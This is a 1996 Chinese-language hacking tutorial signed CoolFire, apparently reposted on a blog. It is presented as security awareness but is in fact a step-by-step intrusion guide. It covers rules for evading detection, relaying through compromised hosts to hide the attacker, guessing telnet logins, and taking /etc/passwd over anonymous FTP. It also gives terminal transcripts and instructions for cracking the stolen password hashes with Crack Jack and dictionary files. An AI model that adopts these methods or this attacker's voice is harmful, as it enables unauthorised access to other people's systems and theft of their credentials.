這不是一個教學文件, 只是告訴你該如何破解系統, 好讓你能夠將自己的系統作安全
的保護, 如果你能夠將這份文件完全看完, 你就能夠知道電腦駭客們是如何入侵你的
電腦, 我是 CoolFire, 寫這篇文章的目的是要讓大家明白電腦安全的重要性, 並不
是教人 Crack Password 若有人因此文件導致惡意入侵別人的電腦或網路, 本人概不
負責 !!
#1 甚麼是 Hacking ?
就是入侵電腦! 有甚麼好解釋的! 大部份有關介紹 Hacker 的書籍或小說及文件
等都有清楚的介紹, 沉迷於電腦的人... 破壞... 唉! 一大堆怪解釋就是了, 最
好不要成為一個 "駭客", 我... 不是!
#2 為甚麼要 Hack ?
我們只是為了要 解更多關於系統的技術, 入侵它,瞭解它是如何運作的, 試試
它的安全性, 然後學著去使用它, 讀取系統中有關操作的說明, 學習它的各項操
作 !! 為了安全性而作革命!
#3 Hack 守則
1. 不惡意破壞任何的系統, 這樣作只會給你帶來麻煩.
惡意破壞它人的軟體將導致法律刑責, 如果你只是使用電腦, 那僅為非法使
用!! 注意: 千萬不要破壞別人的軟體或資料 !!
2. 不修改任何的系統檔, 如果你是為了要進入系統而修改它, 請在答到目的後
將它改回原狀.
3. 不要輕易的將你要 Hack 的站台告訴你不信任的朋友.
4. 不要在 bbs 上談論你 Hack 的任何事情.
5. 在 Post 文章的時候不要使用真名.
6. 正在入侵的時候, 不要隨意離開你的電腦.
7. 不要侵入或破壞政府機關的主機.
8. 不在電話中談論你 Hack 的任何事情.
9. 將你的筆記放在安全的地方.
10. 想要成為 Hacker 就要真正的 Hacking, 讀遍所有有關係統安全或系統漏洞
的文件 (英文快點學好)!
11. 已侵入電腦中的帳號不得清除或修改.
12. 不得修改系統檔案, 如果為了隱藏自己的侵入而作的修改則不在此限, 但仍須
維持原來系統的安全性, 不得因得到系統的控制權而將門戶大開 !!
13. 不將你已破解的帳號分享與你的朋友.
#4 破解之道
1. 進入主機中
2. 得到 /etc/passwd
3. 得到系統帳號
4. 得到最高權限

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
How 1.
進入主機有好幾種方式, 可以經由 Telnet (Port 23) 或 SendMail (Port 25)
或 FTP 或 WWW (Port 80) 的方式進入, 一台主機雖然只有一個位址, 但是它可能
同時進行多項服務, 所以如果你只是要 "進入" 該主機, 這些 Port 都是很好的進
行方向. 當然還有很多 Port, 但是 DayTime 的 Port 你能拿它作甚麼??? 我不知
道, 你知道嗎?!
底下的示範並不是像寫出來的那麼容易, 只不過是要讓你 解如何進入, 當然其
中還有很多問題, 如打錯指令...... 等等的毛病... 沒有出現在課堂上, 但是我為了
面子.... 一定要刪掉這些不堪入目的東西嘛...
示範進入主機的方法: (By CoolFire)

(首先要先連上某一台你已經有帳號的 Telnet 主機, 當然最好是假的, 也就是 Crack
過的主機, 然後利用它來 Crack 別的主機, 才不會被別人以逆流法查出你的所在)
Digital UNIX (ms.hinet.net) (ttypa)
login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0
(我用的是 ms.hinet.net ... 當然是假的羅, 都已經經過修改了啦 !!
沒有這一台主機啦 !! 別怕 ! 別怕 ! 以下的主機名稱都是假的名
稱, 請同學們要記得 !!)
Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)
(嗯... 進來了 ! 開始攻擊吧 ! 本次的目標是......)
ms.hinet.net> telnet www.fuckyou.hinet.net (Telnet 試試看....)
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect
(沒關係, 再來 !!)
cool login: hinet
Password:
Login incorrect
cool login:
(都沒猜對, 這邊用的是 猜 的方法, 今天運氣好像不好)
telnet> close
Connection closed.
(重來, 換個 Port 試試看 !!)
ms.hinet.net> telnet 111.222.255.255 80
Trying 111.222.255.255...
Connected to 111.222.255.255.
Escape character is '^]'.



Error


Error 400


Invalid request "" (unknown method)


CERN-HTTPD 3.0A



Connection closed by foreign host.
(哇哩 !! 連密碼都沒得輸入, 真是..... 再來 !! 要有恆心 !!)
(換 FTP Port 試試)
ms.hinet.net> ftp 111.222.255.255
Connected to 111.222.255.255.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (111.222.255.255:FakeName): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user! This is an experimental FTP server. If have any
230-unusual problems, please report them via e-mail to root@cool.com
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
(哇 ! 可以用 anonymous 進來耶!! password 部份輸入 aaa@ 就好了 !
不要留下足跡喔!!)
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
etc
pub
usr
bin
lib
incoming
welcome.msg
226 Transfer complete.
(嗯嗯... 太好了 ! 進來了 !! 下一個目標是.....)
ftp> cd etc
250 CWD command successful.
ftp> get passwd (抓回來 !!)
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (566 bytes).
226 Transfer complete.
566 bytes received in 0.56 seconds (0.93 Kbytes/s)
(喔... 這麼容易嗎??)
ftp> !cat passwd (看看 !!!)
root::0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/var/spool/news:
uucp:*:10:14:uucp:/var/spool/uucp:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
ftp:*:404:1::/home/ftp:/bin/bash
(哇哩... 是 Shadow 的... 真是出師不利.... )
ftp> bye
221 Goodbye.
(不信邪.... 還是老話, 要有恆心....)
(FTP 不行, 再 Telnet 看看 !!)
ms.hinet.net> telnet www.fuckyou.hinet.net
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect
(又猜錯 !!)
cool login: fuckyou
Password:
Last login: Mon Dec 2 09:20:07 from 205.11.122.12
Linux 1.2.13.
Some programming languages manage to absorb change but withstand
progress.
cool:~$
(哇哈哈 !! 哪個笨 root, 用 system name 作 username 連
password 也是 system name.... 總算... 沒白玩...)
cool:~$ system
bash: system: command not found
(嗯... 這個 user 的權限好像不大....)
cool:~$ ls
cool:~$ pwd
/home/fuckyou
cool:~$ cd /
cool:/$ ls
Public/ cdrom/ lib/ mnt/ tmp/ www/
README dev/ linux* proc/ usr/
bin/ etc/ local/ root/ var/
boot/ home/ lost+found/ sbin/
cool:/$ cd etc
telnet> quit
(好想睡呀 !! 不玩了 !! 下節課再開始....)
Connection closed.
ms.hinet.net> exit
(走了 !! 下節課在見啦 !! 今天就上到這裡 ! 老師要先下班了 !!)
(有學生說: 騙人! 還沒有破解呀!! 胡說 ! 不是已經進來了嗎 ???
看看這節課上的是甚麼??? ---->進入主機 !! 嗯.....)
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
How 2.

上節課抓回來一個 "亂七八糟" 的 /etc/passwd, 你以為我的真那麼笨嗎?? guest 所
抓回來的能是甚麼好東西?? 所以這一節課繼續上次的攻擊行動. 上節課我們已
經 "猜" 到了一個不是 guest 的 username 及 password. 今天就以它來進入主機瞧瞧 !!
Digital UNIX (ms.hinet.net) (ttypa)
login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0
Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)
(嗯... 進來了 ! 開始攻擊吧 ! 本次的目標是.....呵...)
ms.hinet.net> telnet cool.fuckyou.hinet.net (Telnet 試試看.... 昨天的位址, 有作筆記吧!)
stsvr.showtower.com.tw> telnet cool.fuckyou.hinet.net
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect
cool login: fuckyou
Password: (一樣輸入 fuckyou)
Last login: Mon Dec 1 12:44:10 from ms.hinet.net
Linux 1.2.13.
cool:~$ cd /etc
cool:/etc$ ls
DIR_COLORS ftpusers localtime resolv.conf
HOSTNAME gateways magic rpc
NETWORKING group mail.rc securetty
NNTP_INEWS_DOMAIN host.conf motd sendmail.cf
X11@ hosts messages/ sendmail.st
XF86Config hosts.allow mtab services
at.deny hosts.deny mtools shells
bootptab hosts.equiv named.boot shutdownp
csh.cshrc hosts.lpd networks snoopy/
csh.login httpd.conf nntpserver slip.hosts
exports inetd.conf passwd snooptab
fastboot inittab passwd.OLD syslog.conf
fdprm issue passwd.old syslog.pid
fstab ld.so.cache printcap ttys
ftpaccess ld.so.conf profile utmp@
(找尋目標..... 太亂了 ! 懶得找, 再來 ....)
cool:/etc$ ls pa*
passwd passwd.OLD passwd.old
(果然在)
cool:/etc$ more passwd
(看看有沒有 Shadow...)
root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john
(正點 ! 一點都沒有防備 !!)
cool:/etc$ exit
logout
(走了!.... 換 FTP 上場 !!)
Connection closed by foreign host.
ms.hinet.net> ftp www.fuckyou.hinet.net
Connected to cool.fuckyou.hinet.net.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (www.fuckyou.hinet.net:66126): fuckyou
331 Password required for fuckyou.
Password:
230 User fuckyou logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /etc
250 CWD command successful.
ftp> get passwd
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (350 bytes).
226 Transfer complete.
350 bytes received in 0.68 seconds (1.9 Kbytes/s)
ftp> !cat passwd
root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john
(看看 ! 呵 ! 假不了 !!......)
ftp> bye
221 Goodbye.
ms.hinet.net> exit
(閃人羅 !! 下課 !!.... 喔慢點, 還有事要說明......)
passwd 的 Shadow 就是把 passwd 放在 shadow 檔中, 而你原先在第一節課
所看到的這個格式的 passwd 並不是真正的 passwd....
root::0:0:root:/root:/bin/bash
因為密碼的部份沒有東西.... 所以拿了也沒有用 !! 但這一節課所拿到的東西呢,
像是這樣, 有幾點需要說明的, 就是它究竟代表著甚麼???
john:234ab56:9999:13:John Smith:/home/john:/bin/sh
它以 ":" 分成幾個欄位, 各欄位對照如下:
User Name: john
Password:234ab56
User No: 9999
Group No: 13
Real Name: John Smith
Home Dir: /home/john
Shell: /bin/sh
了吧 ! 了吧 ! 保留著你千辛萬苦所拿到的 passwd, 咱們第三節
課再來告訴各位如何使用 Crack Jack 把 passwd 解碼.... 呵呵...
zzZZzZzz...
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Crack Jack V1.4 中文使用說明 (By CoolFire 12-1-1996)
嗯... 該到第三課了 !! 累了的同學先去喝口水吧!
這一節課咱們來說說 Crack Jack ! 這可是個解讀 /etc/passwd 的好工具喔, 不要告訴我你習慣用
Brute, 拿 Brute 跟 Crack Jack 的速度比比看, 包準你馬上投向 Crack Jack 1.4 的懷抱, 但請
先確定你所使用的是 Crack Jack 1.4, 你可以在 CoolFire 的 Hacker&Mailer Page 中拿到這個版
本的 Crack Jack ! 這才是真正有用的版本, 速度... 對... 就是這點別人都比不上 ! 但還是要講
講它的缺點... 就是只能在 DOS 跟 OS2 中跑, 如果在 Windoz 95 上開個 DOS Mode 跑, 它可是連
理都不會理你的 !
OK! 現在切入正題 ! etc/passwd 拿到手了吧 !! 開始羅 !! 使用 Crack Jack 1.4 前所需要的東
西有這些 [1] Crack Jack 1.4 (廢話...$%^&@@) [2] /etc/passwd 檔案, 你可以在 Unix 系統中
的 /etc/ 目錄中找到 passwd [3] 字典檔 (哪裡找, 自己敲... 呵 ClayMore 中有一份 DIC.TXT
是有一千多個字的字典, 但比起我的字典可就小巫見大巫了, LetMeIn! 1.0 裡面也有, 聽 James
說 2.0 Release 的時候會有更棒的字典檔含入, 期待吧!).... 使用 Crack Jack 1.4 前需先確
定你所使用的機器是 386 含以上 CPU 的 ! 然後最好有充足的記憶體 !!
開始 Jack 時只要敲入 JACK 即可, 它會問你 PW Name... 輸入你的 passwd 檔名, Dictionary
Name 輸入你的字典檔名, Jack 就會開始找了 ! 找到時會告訴你, 也會在 JACK.POT 中寫入它所
找到的密碼 !! 但... 有點怪的格式! 如果找到的是具 root 權限的密碼, Jack 會告訴你 This is
JackAss... 嗯...說髒話了 !! 因為使用 Jack 佔用的時間實在太多, 如果你中途想要停掉時只要
按下 Ctrl-C 即可, 別以為你前功盡棄了! 因為 Jack 有個 Restore 的功能, 中斷時會自動存檔
為 RESTORE, 下次要繼續這次的尋找只要輸入 Jack -Restore:RESTORE 即可 !! 當然你也可以為
你的 Restore 重新命名 ! Jack 也會找得到的 ... 如 Ren restore restore.HNT 之後要再尋找
的時後就 Jack -Restore:RESTORE.HNT 即可... Jack 會很自動的 Restore 前次所尋找的字串...
繼續幫你找下去....
字典檔哪裡找: 我的不給你! 可以找別的 Brute Force 之類的程式, 有些裡面會附, 或是找找其它
的 Hacker 地下站看看有沒有, 自己編一個, 或找個英漢字典軟體將字典的部份解出來, 可能要有
一點資料欄位及寫程式的基礎.
[這一節課沒有範例] 成功的案例: 找到過某家網路咖啡店的 root 權限密碼 ! Jack 好正點呀 !!!
所花的時間: 20 分鐘左右... 但也有找了一兩天也找不到的..... 嗚... 駭客們! 加油吧 !!

    全站熱搜

    Neo Chao 發表在 痞客邦 留言(0) 人氣()